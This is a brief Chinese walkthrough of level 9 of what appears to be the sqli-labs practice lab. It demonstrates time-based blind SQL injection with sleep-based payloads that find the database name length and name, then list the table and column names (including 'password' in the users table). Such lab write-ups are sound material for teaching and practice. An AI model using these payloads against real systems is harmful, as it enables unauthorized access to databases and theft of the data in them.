(1)無論輸入啥，都回顯相同

（2）第五關、第八關以及這關都是使用盲註，除了第五關說的雙註入外，也可使用時間註入法。

?id=1‘ and sleep(3) --+

發現有明顯延遲，說明可以使用時間註入，

?id=1‘ and if(length(database())=8 , sleep(5), 1) --+

從1嘗試到8發現有明顯延遲，說明數據庫名為八位

（3）同樣的爆庫名

?id=1‘ and if(left(database(),1)=‘s‘ , sleep(5), 1) --+

?id=1‘ and if(left(database(),8)=‘security‘ , sleep(5), 1) --+

繼續嘗試可得庫名：security

（4）爆表名

?id=1‘ and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=‘r‘ , sleep(5), 1) --+

改變Limit的第一個參數可以得到所有表名。

（5）爆字段

?id=1‘ and if(left((select column_name from information_schema.columns where table_name=‘users‘ limit 1,1),8)=‘password‘, sleep(5), 1) --+

改變Limit的第一個參數可以得到user表中得所有字段。

SQLI DUMB SERIES-9